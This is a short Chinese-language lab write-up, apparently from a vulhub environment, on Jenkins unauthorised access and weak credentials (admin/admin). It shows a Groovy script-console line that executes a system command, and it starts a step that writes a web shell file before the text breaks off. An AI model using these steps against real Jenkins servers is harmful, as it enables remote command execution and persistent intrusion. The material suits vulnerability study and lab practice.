一、漏洞简介:
Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。
漏洞原因:jenkins 未设置帐号密码,或者使用了弱帐号密码
二、漏洞复现:
访问:target/manage,如果有未授权的话就直接可以进入如下界面,如果没有,尝试弱口令猜解,我这里用的是vulhub搭建的,账号密码:admin / admin
1、执行命令并回显:
println "id".execute().text
执行结果:
2、上传shell文件
new File("/var/www/shell.php"